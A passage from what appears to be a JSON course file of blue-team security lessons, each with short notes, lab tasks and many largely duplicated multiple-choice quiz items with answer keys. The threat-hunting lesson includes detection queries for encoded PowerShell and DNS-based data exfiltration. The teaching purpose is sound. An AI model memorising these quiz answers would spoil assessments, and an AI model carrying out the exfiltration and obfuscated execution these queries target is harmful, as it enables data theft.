honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-dlp","cat":"Defense & Blue Team","title":"Data Loss Prevention","diff":2,"xp":150,"intro":"Prevent sensitive data from leaving the organization.","sections":[{"type":"text","content":"Prevent sensitive data from leaving the organization."},{"type":"code","lang":"bash","content":"# DLP monitors: email, web, endpoints, cloud\n# Detects: credit cards, SSNs, source code, PII\n# Actions: block, alert, encrypt, quarantine\n# Tools: Symantec DLP, Digital Guardian, Microsoft DLP"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"DLP prevents...","opts":["Network attacks","Sensitive data from being exfiltrated","Malware","Unauthorized login"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-soc-triage","cat":"Defense & Blue Team","title":"SOC Alert Triage","diff":1,"xp":75,"intro":"How to handle security alerts efficiently.","sections":[{"type":"text","content":"How to handle security alerts efficiently."},{"type":"code","lang":"bash","content":"# Triage workflow:\n# 1. Read the alert (what triggered?)\n# 2. Context (who/what/when/where?)\n# 3. Correlate (related alerts?)\n# 4. Investigate (true or false positive?)\n# 5. Action (contain/escalate/close)"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"First triage step...","opts":["Block the IP","Read and understand the alert","Reboot the server","Call management"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-mitre-navigator","cat":"Defense & Blue Team","title":"MITRE ATT&CK Navigator","diff":2,"xp":150,"intro":"Visualize detection coverage against ATT&CK techniques.","sections":[{"type":"text","content":"Visualize detection coverage against ATT&CK techniques."},{"type":"code","lang":"bash","content":"# ATT&CK Navigator: color-code techniques by detection status\n# Green = detected, Yellow = partial, Red = blind spot\n# Export as JSON/SVG for reporting\n# URL: mitre-attack.github.io/attack-navigator"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Navigator helps visualize...","opts":["Network topology","Detection gaps across ATT&CK techniques","User accounts","Firewall rules"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-purple-team","cat":"Defense & Blue Team","title":"Purple Team Exercises","diff":3,"xp":200,"intro":"Red + blue working together to improve detection.","sections":[{"type":"text","content":"Red + blue working together to improve detection."},{"type":"code","lang":"bash","content":"# 1. Pick ATT&CK technique (e.g. T1059.001 PowerShell)\n# 2. Red executes on test system\n# 3. Blue checks: did SIEM/EDR alert?\n# 4. If no: build detection\n# 5. If yes: verify quality\n# 6. Document and move to next"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Purple teaming combines...","opts":["Two red teams","Red team attacks + blue team detection","Two blue teams","Automated scanning"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-threat-hunt2","cat":"Defense & Blue Team","title":"Threat Hunting Techniques","diff":3,"xp":200,"intro":"Proactively search for threats that evade detection.","sections":[{"type":"text","content":"Proactively search for threats that evade detection."},{"type":"code","lang":"bash","content":"# Hypothesis: attacker using encoded PowerShell\nindex=windows EventCode=4104 ScriptBlockText=*frombase64*\n# Hypothesis: data exfil via DNS\nindex=dns query_length>50 | stats count by src_ip query"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Threat hunting is...","opts":["Reactive","Proactive search for undetected threats","Automated","Compliance"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-edr2","cat":"Defense & Blue Team","title":"EDR Solutions Comparison","diff":3,"xp":200,"intro":"Compare endpoint detection platforms.","sections":[{"type":"text","content":"Compare endpoint detection platforms."},{"type":"code","lang":"bash","content":"# CrowdStrike Falcon: cloud-native, lightweight agent\n# DarknodeOne: autonomous response, deep visibility\n# Carbon Black: VMware integration, behavioral analysis\n# Microsoft Defender: built into Windows, cloud integration\n# Elastic: open-source, customizable"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"EDR differs from AV by...","opts":["Being simpler","Behavioral detection + investigation + response capability","Scanning files only","Being free"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-log-forensics","cat":"Defense & Blue Team","title":"Log-Based Investigation","diff":2,"xp":150,"intro":"Investigate incidents using only log data.","sections":[{"type":"text","content":"Investigate incidents using only log data."},{"type":"code","lang":"bash","content":"# Key questions:\n# When did it start? (first suspicious event)\n# What was accessed? (file, URL, database)\n# Who did it? (user, IP, process)\n# How? (technique used)\n# What's the impact? (data exfil, lateral movement)"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Log investigation starts with...","opts":["Blocking IPs","Establishing a timeline of events","Reinstalling systems","Changing passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack 